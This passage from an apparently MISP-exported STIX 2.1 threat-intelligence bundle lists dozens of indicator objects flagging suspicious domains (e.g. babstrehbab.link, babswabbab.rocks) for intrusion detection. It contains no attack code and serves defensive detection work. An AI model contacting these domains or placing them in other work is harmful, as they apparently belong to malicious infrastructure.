"id": "indicator--58db6c93-5da0-41c7-9df3-40d8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstrehbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c93-71c0-4ddd-a930-4e01950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstribbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c94-80f0-4646-822d-4f69950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstrihbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c95-5524-4166-8886-46f9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstrolbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c96-46ac-4b2d-aff5-4717950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsulbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c97-bbb4-42c1-bca8-4158950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babswabbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c98-51cc-4be1-8578-4690950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babswabbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c98-0afc-42ad-bde7-4698950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babswebbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c99-0530-407c-a599-47d6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babswehbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c9a-5384-4914-a985-4a50950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babswibbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c9b-77a8-407a-abd9-480a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babswihbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c9c-fcd4-4119-8bbd-4c7a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babswolbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c9d-addc-404f-bb55-4a2a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtabbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c9d-4dcc-4d54-8383-4ff9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtahbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c9e-9a00-4c45-98fe-4780950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtebbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c9f-1588-446d-9380-4b1f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtebbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca0-e308-484f-9f8c-4420950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtehbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca1-4e78-4906-b47e-47ec950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtibbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca2-6e2c-427d-bbe4-421e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtihbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca2-4064-420a-848f-493f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtohbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca3-6154-426f-a356-4611950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtrabbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca4-d5cc-4643-bcbc-479c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtrabbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca5-7b7c-4691-809a-4243950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtrebbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca6-09e8-4256-9b6a-4389950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtrehbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca7-6c28-4d28-ae30-4fc0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtribbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca7-0300-46be-b025-4853950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtrihbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca8-bf40-4c91-9a89-4894950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtrolbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ca9-1f88-466e-8667-4ace950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babtulbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6caa-506c-4151-a4dc-4a9a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvabbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cab-c3dc-4c25-b3aa-4ffa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvahbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cac-15a0-4419-b2f1-4839950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvebbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cac-60f0-48fc-b45d-4049950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvebbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cad-ac5c-4a87-89a9-4528950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvehbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cae-5194-49e8-93c2-448a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvibbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6caf-9710-4958-93af-4443950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvihbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
